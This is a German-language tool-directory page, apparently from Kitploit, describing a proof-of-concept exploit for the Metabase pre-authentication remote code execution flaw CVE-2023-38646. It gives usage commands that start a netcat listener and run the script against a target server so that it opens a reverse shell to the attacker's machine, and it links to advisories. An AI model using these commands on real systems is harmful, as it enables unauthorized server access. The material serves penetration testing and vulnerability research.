Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38646 — Dies ist ein Proof of Concept (PoC)-Skript zur Ausnutzung von Metabase, einem Open-Source-Tool für Business Intelligence und Datenanalyse. | Kitploit
Tools/GitHubGitHub/threathntr/cve-2023-38646
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubthreathntr/cve-2023-38646

CVE-2023-38646

Dies ist ein Proof of Concept (PoC)-Skript zur Ausnutzung von Metabase, einem Open-Source-Tool für Business Intelligence und Datenanalyse.

Repository anzeigen
1115vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38646 PoC

Beschreibung

Dies ist ein Proof-of-Concept-Skript (PoC) zur Ausnutzung von Metabase, einem Open-Source-Tool für Business Intelligence und Datenanalyse. Metabase ermöglicht es Benutzern, ihre Daten zu visualisieren und mit ihnen zu interagieren, was es zu einer leistungsstarken Plattform für die Datenanalyse macht.

Diese Schwachstelle, die als CVE-2023-38646 bezeichnet wird, erlaubte es Angreifern, beliebige Befehle auf dem Server auszuführen, ohne dass eine Authentifizierung erforderlich war. Die Auswirkungen dieses Fehlers waren schwerwiegend, da er unbefugten Zugriff auf den Server mit den Rechten des Servers gewährte.

Proof of Concept (PoC) Schritte

Dieses Repository klonen

git clone https://github.com/threatHNTR/CVE-2023-38646.git

In das Repository wechseln

cd CVE-2023-38646

Bevor Sie das Skript ausführen, richten Sie einen Netcat-Listener ein

nc -nlvp chosen-port

Das Skript ausführen

python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port

Ausnutzung: Das Skript versucht, eine Reverse-Shell an den Ziel-Metabase-Server zu senden. Im Erfolgsfall erhalten Sie eine Shell auf Ihrem Rechner. Sie können das Payload gerne ändern, um verschiedene Reverse-Shells auszuprobieren.

Referenzen

  • GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg

  • Metabase Advisory: https://www.metabase.com/blog/security-advisory

  • Metabase GitHub: https://github.com/metabase/metabase

  • Assetnote Blog - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Tool herunterladen